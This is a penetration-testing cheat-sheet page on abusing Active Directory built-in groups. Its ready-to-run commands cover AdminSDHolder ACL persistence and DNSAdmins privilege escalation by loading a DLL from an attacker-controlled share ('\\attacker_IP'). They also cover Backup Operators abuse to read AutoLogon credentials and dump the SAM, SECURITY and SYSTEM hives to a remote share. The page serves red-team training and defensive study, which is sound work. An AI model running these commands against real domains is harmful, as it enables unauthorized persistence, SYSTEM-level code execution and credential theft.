ad-adds-groups.md (6898B)
1 --- 2 title: "Active Directory - Groups" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adds-groups.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adds-groups.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Groups 12 13 ## Dangerous Built-in Groups Usage 14 15 If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `adminCount` attribute to `0` for the required object. 16 17 > The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s). 18 19 Find users with `AdminCount=1`. 20 21 ```ps1 22 netexec ldap 10.10.10.10 -u username -p password --admin-count 23 # or 24 bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName 25 # or 26 python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10 27 jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json 28 # or 29 Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)" 30 Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)" 31 # or 32 ([adsisearcher]"(AdminCount=1)").findall() 33 ``` 34 35 ## AdminSDHolder Attribute 36 37 > The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins. 38 39 If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour). 40 41 E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group. 42 43 * Windows/Linux: 44 45 ```ps1 46 bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 add genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john 47 48 # Clean up after 49 bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 remove genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john 50 ``` 51 52 * Windows only: 53 54 ```ps1 55 # Add a user to the AdminSDHolder group: 56 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose 57 58 # Right to reset password for toto using the account titi 59 Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword 60 61 # Give all rights 62 Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All 63 ``` 64 65 ## DNS Admins Group 66 67 > It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM). 68 69 :warning: Require privileges to restart the DNS service. 70 71 * Enumerate members of DNSAdmins group 72 * Windows/Linux: 73 74 ```ps1 75 bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get object DNSAdmins --attr msds-memberTransitive 76 ``` 77 78 * Windows only: 79 80 ```ps1 81 Get-NetGroupMember -GroupName "DNSAdmins" 82 Get-ADGroupMember -Identity DNSAdmins 83 ``` 84 85 * Change dll loaded by the DNS service 86 87 ```ps1 88 # with RSAT 89 dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll 90 dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll 91 92 # with DNSServer module 93 $dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All 94 $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll" 95 Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose 96 ``` 97 98 * Check the previous command success 99 100 ```ps1 101 Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll 102 ``` 103 104 * Restart DNS 105 106 ```ps1 107 sc \\dc01 stop dns 108 sc \\dc01 start dns 109 ``` 110 111 ## Schema Admins Group 112 113 > The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory. 114 115 ## Backup Operators Group 116 117 > Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. 118 119 This groups grants the following privileges : 120 121 * SeBackup privileges 122 * SeRestore privileges 123 124 Get members of the group: 125 126 * Windows/Linux: 127 128 ```ps1 129 bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get object "Backup Operators" --attr msds-memberTransitive 130 ``` 131 132 * Windows only: 133 134 ```ps1 135 PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse 136 ``` 137 138 Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege) 139 140 ```ps1 141 Import-Module .\SeBackupPrivilegeUtils.dll 142 Import-Module .\SeBackupPrivilegeCmdLets.dll 143 144 Set-SeBackupPrivilege 145 Get-SeBackupPrivilege 146 ``` 147 148 Retrieve sensitive files 149 150 ```ps1 151 Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite 152 ``` 153 154 Retrieve content of AutoLogon in the `HKLM\SOFTWARE` hive 155 156 ```ps1 157 $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64) 158 $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') 159 $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} 160 ``` 161 162 Retrieve `SAM`,`SECURITY` and `SYSTEM` hives 163 164 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) 165 166 ```ps1 167 nxc smb 10.10.10.10 -u user -p password -M backup_operator 168 ``` 169 170 * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA) 171 172 ```ps1 173 .\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\ 174 ``` 175 176 * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit) 177 178 ```ps1 179 .\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK 180 ``` 181 182 ## References 183 184 * [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/) 185 * [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)